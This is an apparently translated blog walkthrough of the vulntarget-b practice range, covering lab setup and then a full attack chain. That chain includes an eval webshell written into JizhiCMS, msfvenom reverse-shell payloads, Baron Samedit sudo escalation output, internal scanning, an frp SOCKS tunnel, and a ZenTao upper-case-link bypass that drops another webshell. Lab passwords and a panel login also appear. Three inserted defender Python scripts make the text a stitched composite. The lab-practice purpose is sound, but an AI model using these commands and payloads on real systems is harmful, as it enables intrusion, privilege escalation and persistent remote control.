Vulntarget vulnerability range - vulntarget-b
2022-07-25 02:43:00 【amingMM】
vulntarget-b
Environment preparation
Update time: 2021.12.23
vulntarget is a range designed and built by Friday Lab (星期五实验室). It covers web vulnerabilities, host vulnerabilities, domain vulnerabilities and industrial control vulnerabilities.
GitHub address:
https://github.com/crow821/vulntarget
Download address:
Baidu cloud
Link: https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA
Extraction code: s4ka
Related vulnerability techniques
JizhiCMS (极致CMS) related vulnerabilities,
ZenTao CMS related vulnerabilities,
tunnel proxying,
AV evasion,
CVE-2021-1732,
CVE-2021-42287/CVE-2021-42278
Network topology

Environment build process
centos7

The VMs were created with a VMware product, but they are not compatible with my version of VMware Workstation, so I could not use them.
virtualHW.version = "15" is my VM hardware version
Account information
Two accounts: root/root, vulntarget/root
Version: uname -a

BT Panel (宝塔) is already installed
yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh
bt default

Check the BT Panel web service
==================================================================
Internet panel address : http://125.122.127.185:8888/045b2769
Intranet panel address : http://10.30.7.70:8888/045b2769
username: rpngwb3l
password: b0db10cc
If you cannot access the panel,
release the following panel port [8888] in the security group
If you can't access the panel , Please check the firewall / Does the security group have a release panel [8888] port
==================================================================
Log in to BT Panel and install the web service
Install web
Upload the source code to the panel, then add a website. The environment is nginx+mysql+php7.3
mysql account/password: admin/EcfMrPrtTJGL2GjL

Visit port 81 directly to start installing the web environment
JizhiCMS
JizhiCMS is a free, open-source PHP website content management system that needs no commercial licence. It is simple and easy to use, provides a rich set of plugins,
and helps you build different kinds of websites (corporate sites, portals, personal blogs) with no prior knowledge; it is a good helper for building sites.
Data output calls are completely free and open,
there is no need to configure pseudo-static rules manually, and custom links in various formats are supported.
With its built-in static data cache the webmaster can output any data stored in the database on the front end,
reaching static-page access efficiency without regenerating static pages. Image upload management,
cache cleaning and so on make managing the server's files convenient; complete functionality and easy extension are the highlights of the JizhiCMS site-building system.

Fill in the account and password information, next step
Just install it directly
Home page information
Domain controller 2016
For the domain controller build process refer to vulntarget-a
The firewall is not turned off, wdf does not matter, add a domain member account.
Account information
Domain: vulntarget.com
Domain controller account: administrator
Domain controller password: [email protected]
Domain member account: win101
Domain member password: admin#123
ctrl+alt+Insert to unlock
Password has expired
Version information


Image used: cn_windows_server_2016_x64_dvd_9718765.iso
Domain member win10
Account information
Local account: win10
Password: win10#123
Administrator: administrator, password: [email protected]
Domain member: vulntarget\win101, password: admin#123
Web backend: admin, password: Admin123
Join the domain
Security questions: all filled with win10
Configure the IP and set the DNS to the domain controller's IP
Join the domain and enter the domain controller account and password

Restart and log in as the domain member win101 that was created on the domain controller

Auto-start at boot is not configured; if it were, the privilege obtained would be SYSTEM
Install 360 Security Guard and 360 Antivirus (they do not detect anything inside the virtual machine intranet)

Switch to Huorong (火绒) 5.0
If phpStudy is used for the install, the privilege obtained is administrator's
Switched to IIS to set up the web service; the phpStudy installation below is left as is.
Use phpStudy 2018 to set up the web service
Change the web directory to: \ZenTaoPMS.12.4.2\zentaopms\www

Restart phpStudy and visit 127.0.0.1 to install ZenTao
ZenTao
ZenTao is the first domestic open-source project management software.
Its core management philosophy is based on the agile method Scrum.
It has built-in product management and project management,
and, according to domestic R&D practice, supplements them with test management, plan management, release management, document management, transaction management and other functions,
so that requirements, tasks, bugs, test cases, plans, releases and other elements of software development are tracked and managed in an orderly way in one piece of software, completely covering the core processes of project management.
ZenTao is developed with its self-developed zentaophp framework,
with a complete built-in extension mechanism (not simple hooks), so users can easily carry out thorough secondary development of ZenTao.
ZenTao also provides a JSON API for every page, which makes it convenient for other languages to call and interact with it.
Built-in multilingual support, multi-style support, search, statistics and other practical functions.
PHP 5.4.45 needs the openssl extension

Wait for Apache to restart, then refresh
The phpStudy database password is not changed here; the default is root/root
Set a company name and the backend account/password; start with a simple admin/admin, and after entering the backend there is a forced password change

Change the password to [email protected]

Complete
IIS install web service
Reference: https://www.baishitou.cn/2430.html
First download three files; the download addresses are:
https://windows.php.net/downloads/releases/archives/php-5.4.45-nts-Win32-VC9-x86.zip
https://dev.mysql.com/get/Downloads/MySQL-5.5/mysql-5.5.62-winx64.msi
https://files.phpmyadmin.net/phpMyAdmin/4.4.12/phpMyAdmin-4.4.12-all-languages.7z
Install IIS: in Control Panel -> Programs and Features, select "Turn Windows features on or off"

Check CGI, click OK, and wait for the installation

Before configuring the module mapping, first extract php,
then modify the php configuration file php.ini-development: rename it to php.ini and change three things:
1. Extension directory: extension_dir, remove the leading semicolon and change the directory to C:\inetpub\php\ext

2. Time zone: date.timezone, change it to date.timezone = Asia/Shanghai
3. PHP extensions: remove the leading semicolons from all the extension=php_ lines

Save
Open IIS with administrator privileges and select new site.

Configure module mapping
Add module mapping
Add default document: add index.php

Next install the MySQL database; just follow the instructions in the article. Apart from directories and the like it is basically a default install (https://www.baishitou.cn/2430.html); here the account/password is set to root/root
Install the ZenTao system: visit 127.0.0.1:8080
Default next step; writable permissions need to be set
Modify the permissions accordingly:
right-click the directory, Properties, Security, Edit; the other directories are the same.
The last one is session_save_path, which needs a change in the php.ini file,
then give a directory writable permission;
for the above, C:\inetpub\zentao\zentaopms\tmp will do
(you may need to restart the host if restarting the IIS service does not work).

When all checks pass, move on to the next step

Database: the password is root

Create the new file as instructed, then save

After saving, next step: set the company name.
Delete the file
The first time you enter the backend you need to change the password to a strong one; changed to Admin123
Network configuration
centos7
Bridged mode; both the internal and external networks are set to static IPs
Intranet IP: 10.0.20.33
Extranet IP: 10.30.7.70 (modify according to the actual situation)
Configuration files are in: /etc/sysconfig/network-scripts/

ifcfg-ens33 (extranet, modify according to your own network)
After configuring, restart with reboot
TYPE=Ethernet
PROXY_METHOD=none
BROWSER_ONLY=no
BOOTPROTO=static
DEFROUTE=yes
IPV4_FAILURE_FATAL=no
IPV6INIT=yes
IPV6_AUTOCONF=yes
IPV6_DEFROUTE=yes
IPV6_FAILURE_FATAL=no
IPV6_ADDR_GEN_MODE=stable-privacy
NAME=ens33
UUID=0cc7b380-1eb6-43ad-9c2e-a80190b4017e
DEVICE=ens33
ONBOOT=yes
IPADDR=10.30.7.70 // modify
NETMASK=255.255.248.0 // modify
GATEWAY=10.30.0.1 // modify
DNS1=8.8.8.8
ifcfg-ens37 (intranet, no need to change)
TYPE=Ethernet
PROXY_METHOD=none
BROWSER_ONLY=no
BOOTPROTO=static
DEFROUTE=yes
IPV4_FAILURE_FATAL=no
IPV6INIT=yes
IPV6_AUTOCONF=yes
IPV6_DEFROUTE=yes
IPV6_FAILURE_FATAL=no
IPV6_ADDR_GEN_MODE=stable-privacy
NAME=ens37
DEVICE=ens37
ONBOOT=yes
IPADDR=10.0.20.33
NETMASK=255.255.255.0
Domain member win10
Also uses two network cards: the first communicates with centos, the second with the domain controller
ping centos7:
ping win2016
Domain controller win2016

ping win10: blocked by the firewall
Test the network environment
After getting the range you need to modify the VM network information yourself; you can directly add two networks, VMnet18 and VMnet19, in the Virtual Network Editor.

Penetration
Open it directly
Port scanning
nmap -v ip

Port 81 is the JizhiCMS homepage
Historical vulnerabilities
Backend getshell
Among the JizhiCMS historical vulnerabilities there is a backend getshell
Visit admin.php
Log in to the backend with admin/admin123


In extension management there is a plugin list, which includes an online editing plugin


Download, install and configure it directly
Just enter a password

Enter the password again and you can see the source code, which can be modified
Modify index.php and write a one-liner into it
eval($_POST[aming]);

AntSword (蚁剑) connects to the webshell
http://192.168.31.104:81/

After AntSword connects, trying to execute commands gives ret=127: commands cannot be executed because BT Panel has disabled functions (disable_functions)
Use the AntSword plugin to bypass it directly


Check the IP; another intranet IP is found
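The foothold on this page, both here (the one-liner written into index.php through the online-editing plugin) and later on the ZenTao host (the @eval one-liner dropped into data/client/1/), is a plain eval-of-superglobal webshell. The following is an added example of the check a defender would run over a web root to find that pattern; it is my code, not the range author's or either CMS project's. It scans PHP files for a dangerous sink fed directly from a request superglobal and also notes whether the file was modified recently, which is the usual tell for a tampered front controller. The sample files it writes into a temporary directory are constructed for the demo.

```python
"""Webshell pattern scan for PHP web roots (added defender example)."""
import os
import re
import tempfile
import time

# A dangerous sink fed straight from request data: eval($_POST['x']),
# @assert($_REQUEST[1]), system($_GET[...]) and so on. Whitespace and the
# optional '@' error-suppression prefix are tolerated.
ONE_LINER = re.compile(
    r"@?\s*(eval|assert|system|passthru|shell_exec|exec)\s*\(\s*"
    r"\$_(POST|GET|REQUEST|COOKIE)\s*\[",
    re.IGNORECASE,
)

PHP_SUFFIXES = (".php", ".phtml", ".php5", ".php7")


def scan_php_source(text):
    """Return [(line_no, matched_text)] for each suspicious sink in one file."""
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        m = ONE_LINER.search(line)
        if m:
            hits.append((no, m.group(0)))
    return hits


def scan_web_root(root, changed_within=24 * 3600):
    """Walk a web root and report (relative_path, hits, modified_recently)
    for every PHP file that contains a flagged sink, sorted by path."""
    now = time.time()
    report = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_php_source(fh.read())
            if hits:
                recent = (now - os.path.getmtime(path)) < changed_within
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                report.append((rel, hits, recent))
    return sorted(report)


# Constructed sample web root: a tampered front controller, a dropped
# one-liner under a data directory, and one clean helper file.
SAMPLES = {
    "index.php": "<?php\n// site front controller\nrequire 'app.php';\neval($_POST[aming]);\n",
    "data/client/1/1.php": "<?php @eval($_REQUEST['x']); ?>\n",
    "lib/helper.php": "<?php\nfunction add($a, $b) { return $a + $b; }\n",
}


def demo():
    """Write the samples to a temp dir, scan it, and return the flagged paths."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return [path for path, _hits, _recent in scan_web_root(root)]


if __name__ == "__main__":
    for path in demo():
        print("flagged:", path)
```

Run it against a real web root with scan_web_root("/www/wwwroot/site") and treat any hit in a recently modified file as a priority; the regex is deliberately narrow (a sink directly wrapping a superglobal) so that it stays low-noise, and obfuscated shells need a separate check.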
msf goes online
msf generates a reverse shell payload
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=10.30.7.77 LPORT=4444 -f elf > 4444.elf


msf listener

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set lhost eth0
lhost => eth0
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.31.105:4444


centos7 privilege escalation
Add a route first
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.31.0/255.255.255.0 from host's routing table.
meterpreter >
The 10.0.20.0 segment is found
Find exploitable privilege escalation modules
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.31.104 - Collecting local exploits for x64/linux...
[*] 192.168.31.104 - 43 exploit checks are being tried...
[+] 192.168.31.104 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.31.104 - exploit/linux/local/ptrace_traceme_pkexec_helper: The target appears to be vulnerable.
[+] 192.168.31.104 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
Use exploit/linux/local/sudo_baron_samedit
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/sudo_baron_samedit
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > set session 1
session => 1
msf6 exploit(linux/local/sudo_baron_samedit) > options
Module options (exploit/linux/local/sudo_baron_samedit):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
WritableDir /tmp yes A directory where you can write files.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.31.105 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(linux/local/sudo_baron_samedit) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
2 Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31) - alternative
3 Ubuntu 19.04 x64 (sudo v1.8.27, libc v2.29)
4 Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)
5 Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27) - alternative
6 Ubuntu 16.04 x64 (sudo v1.8.16, libc v2.23)
7 Ubuntu 14.04 x64 (sudo v1.8.9p5, libc v2.19)
8 Debian 10 x64 (sudo v1.8.27, libc v2.28)
9 Debian 10 x64 (sudo v1.8.27, libc v2.28) - alternative
10 CentOS 8 x64 (sudo v1.8.25p1, libc v2.28)
11 CentOS 7 x64 (sudo v1.8.23, libc v2.17)
12 CentOS 7 x64 (sudo v1.8.23, libc v2.17) - alternative
13 Fedora 27 x64 (sudo v1.8.21p2, libc v2.26)
14 Fedora 26 x64 (sudo v1.8.20p2, libc v2.25)
15 Fedora 25 x64 (sudo v1.8.18, libc v2.24)
16 Fedora 24 x64 (sudo v1.8.16, libc v2.23)
17 Fedora 23 x64 (sudo v1.8.14p3, libc v2.22)
18 Manual
Although the attack failed (it has a chance of succeeding)
msf6 exploit(linux/local/sudo_baron_samedit) > set target 12
target => 12
msf6 exploit(linux/local/sudo_baron_samedit) > run
[*] Started reverse TCP handler on 192.168.31.105:4444 via the meterpreter on session 1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[*] Writing '/tmp/I939SoiW.py' (23630 bytes) ...
[*] A successful exploit will create a new root user msf with password tljrisdzsagywsm
[*] Brute forcing ASLR (can take several minutes)...
[+] Success! Created new user msf with password tljrisdzsagywsm
[*] Writing '/tmp/xltJc' (266 bytes) ...
[!] /etc/passwd overwritten, but no session created.
[!] Manual cleanup of the new user in the /etc/passwd file is required.
[!] Take note of the username and password above - these should work to manually escalate privileges.
[*] Exploit completed, but no session was created.
But with this msf account and the password mbmjsjyshkyndln you can log in remotely, and the privilege is root
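The module output above is explicit about what it leaves behind: a new UID 0 user written straight into /etc/passwd, with the password hash stored inline rather than in /etc/shadow, and a note that manual cleanup is required. That is exactly what a host audit should catch. The following is an added example of such a check; it is my code, not the range author's or Metasploit's. It parses passwd-format text and flags any UID 0 account outside an allow-list, any entry carrying an inline hash instead of the usual x placeholder, empty password fields, and malformed lines. The sample passwd content and its hash value are constructed for the demo.

```python
"""Audit /etc/passwd for extra superuser accounts (added defender example)."""
from collections import namedtuple

PasswdEntry = namedtuple("PasswdEntry", "name passwd uid gid gecos home shell")

# Values that mean "no usable hash here" and are normal in a shadowed system.
SHADOW_PLACEHOLDERS = ("x", "*", "!", "!!")


def parse_passwd(text):
    """Parse passwd-format text. Returns (entries, malformed_lines); a line is
    malformed if it does not have 7 colon-separated fields or its UID/GID is
    not numeric, which is itself worth reporting after a file was overwritten."""
    entries, malformed = [], []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            malformed.append(raw)
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries, malformed


def audit_passwd(text, allowed_uid0=("root",)):
    """Return a list of (severity, account, reason) findings."""
    entries, malformed = parse_passwd(text)
    findings = [("high", "<malformed>", "unparseable line: %r" % line) for line in malformed]
    for e in entries:
        if e.uid == 0 and e.name not in allowed_uid0:
            findings.append(("high", e.name, "UID 0 account not in allow-list"))
        if e.passwd == "":
            findings.append(("high", e.name, "empty password field (no password required)"))
        elif e.passwd not in SHADOW_PLACEHOLDERS:
            findings.append(("high", e.name, "password hash stored inline in /etc/passwd"))
    return findings


# Constructed sample: a CentOS-style passwd file with one entry appended by an
# exploit. The hash is a placeholder string, not a real credential.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
vulntarget:x:1000:1000::/home/vulntarget:/bin/bash
msf:$1$placeholder$PLACEHOLDERHASHxxxxxxxx:0:0::/root:/bin/bash
"""


def audit_file(path="/etc/passwd"):
    """Convenience wrapper for running the audit on a live host."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for severity, account, reason in audit_passwd(SAMPLE_PASSWD):
        print(severity, account, reason)
```

On a real host, pair audit_file() with a baseline copy of /etc/passwd so that any new line, not only UID 0 ones, is reported; the inline-hash check is the specific signature of this escalation path, because a normal CentOS install keeps every hash in /etc/shadow.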
Reverse shell with root privileges
Use the msf account again to run 4444.elf and get a root reverse shell
Domain member win10
After getting the external-network shell, add a route and probe the intranet for next-hop addresses
Module used: auxiliary/scanner/portscan/tcp
background
[*] Backgrounding session 2...
msf6 auxiliary(scanner/portscan/tcp) > set session 2
session => 2
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 10.0.20.0/24
rhosts => 10.0.20.0/24
msf6 auxiliary(scanner/portscan/tcp) > set ports 21,22,80,135,139,445,8080
ports => 21,22,80,135,139,445,8080
msf6 auxiliary(scanner/portscan/tcp) > set threads 30
threads => 30
msf6 auxiliary(scanner/portscan/tcp) > run
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 10.0.20.30: - 10.0.20.30:21 - TCP OPEN
[+] 10.0.20.30: - 10.0.20.30:22 - TCP OPEN
[+] 10.0.20.30: - 10.0.20.30:80 - TCP OPEN
[*] 10.0.20.0/24: - Scanned 31 of 256 hosts (12% complete)
[*] 10.0.20.0/24: - Scanned 61 of 256 hosts (23% complete)
[+] 10.0.20.66: - 10.0.20.66:8080 - TCP OPEN
[*] 10.0.20.0/24: - Scanned 89 of 256 hosts (34% complete)
[*] 10.0.20.0/24: - Scanned 111 of 256 hosts (43% complete)
[*] 10.0.20.0/24: - Scanned 140 of 256 hosts (54% complete)
[*] 10.0.20.0/24: - Scanned 154 of 256 hosts (60% complete)
[*] 10.0.20.0/24: - Scanned 182 of 256 hosts (71% complete)
[*] 10.0.20.0/24: - Scanned 214 of 256 hosts (83% complete)
[*] 10.0.20.0/24: - Scanned 245 of 256 hosts (95% complete)
[*] 10.0.20.0/24: - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
The IP 10.0.20.66 on the same segment is found, with port 8080 open
frp proxy
Uploading larger files through msf or AntSword often errors out, so an frp proxy is more stable
Run frps on kali; the frps.ini configuration file is:
[common]
bind_ip = ip //kali IP
bind_port = 7000
Run: ./frps -c frps.ini
Upload frpc to centos; the configuration file is
frpc.ini:
[common]
server_addr = kali ip
server_port = 7000
[socks_proxy]
type = tcp
remote_port =8888
plugin = socks5
./frpc -c frpc.ini

ZenTao backend getshell

Through the frp proxy visit port 8080 and log in to the backend with admin/Admin123
In ZenTao 12.4.2, the filtering in the downloadZipPackage function of the download module is not strict and can be bypassed using the ftp or HTTP protocol.
Write the trojan on centos
echo "<?php @eval(\$_REQUEST['x']); ?> " >1.php // AntSword did not connect with POST; you can try it yourself
// gotcha
echo ^<?php @eval($_REQUEST[1]);?^> > index.php
<?php eval($_POST['aming']);?>
Start a Python HTTP server
python -c 'import pty; pty.spawn("/bin/bash")' // interactive shell
python -m SimpleHTTPServer 4567
Base64-encode the http link
HTTP://10.0.20.31:4567/1.php // upper-case
SFRUUDovLzEwLjAuMjAuMzE6NDU2Ny8xLnBocA==
Visit http://10.0.20.66:8080/client-download-1-SFRUUDovLzEwLjAuMjAuMzE6NDU2Ny8xLnBocA==-1.html
Because it is deployed on IIS the file is parsed directly, and it turned out that the .html file does not exist
Switched to another ZenTao backend EXP, and it saved successfully
http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzM6NDU2Ny8xLnBocA==

Visit http://10.0.20.66:8080/data/client/1/1.php; it shows a server error

AntSword can connect, using the frp proxy
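The download step above gets a link past the check by writing the scheme as upper-case HTTP://, which points to a case-sensitive deny-list on the decoded link. The following is an added example, my code and not ZenTao's or the range author's, that puts an illustrative reconstruction of that kind of check beside an allow-list version: it base64-decodes the link strictly, parses it as a URL, folds the scheme to lower case, rejects user@host tricks and only accepts a known download host. The allowed host downloads.example.com and the "not base64" input are constructed for the demo; the weak check is a reconstruction of the behaviour described on this page, not ZenTao's actual source.

```python
"""Weak deny-list vs. allow-list validation of a base64 link parameter
(added defender example)."""
import base64
import binascii
import re
from urllib.parse import urlsplit


def decode_link(b64):
    """Strictly base64-decode the link parameter; None on any decode error."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def weak_link_check(link):
    """Illustrative reconstruction of a bypassable check: a case-sensitive
    deny-list on the scheme. 'HTTP://' and 'ftp://' both slip past it."""
    return not re.match(r"^https?://", link)


# Constructed allow-list of hosts the application is allowed to fetch from.
ALLOWED_HOSTS = {"downloads.example.com"}


def hardened_link_check(link):
    """Allow-list: scheme must be https after case-folding, no credentials in
    the authority, and the host must be one we expect to download from."""
    parts = urlsplit(link)
    if parts.scheme.lower() != "https":
        return False
    if parts.username or parts.password:
        return False
    host = (parts.hostname or "").lower()
    return host in ALLOWED_HOSTS


def evaluate(b64_param, checker):
    """Decode a request parameter and run it through a checker.
    Returns (decoded_link_or_None, accepted)."""
    link = decode_link(b64_param)
    if link is None:
        return (None, False)
    return (link, checker(link))


if __name__ == "__main__":
    # The upper-case link from the walkthrough above, base64-encoded as on the page.
    param = "SFRUUDovLzEwLjAuMjAuMzE6NDU2Ny8xLnBocA=="
    print("weak    :", evaluate(param, weak_link_check))
    print("hardened:", evaluate(param, hardened_link_check))
```

The design point is that a deny-list on a string prefix is the wrong shape for this check: anything the filter author did not think of (case, another scheme, an embedded credential) passes by default, whereas an allow-list on the parsed, normalised URL fails closed.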


Huorong evasion, msf goes online
What I wanted to do was evade 360, but it turned out the intranet 360 Security Guard and 360 Antivirus do not work in the virtual machine
Using the tool directly evades Huorong
msf generates an exe
┌──(rootamingMM)-[/home/amingmm/Desktop]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.31.105 lport=4758 -f exe > /home/amingmm/Desktop/4758.exe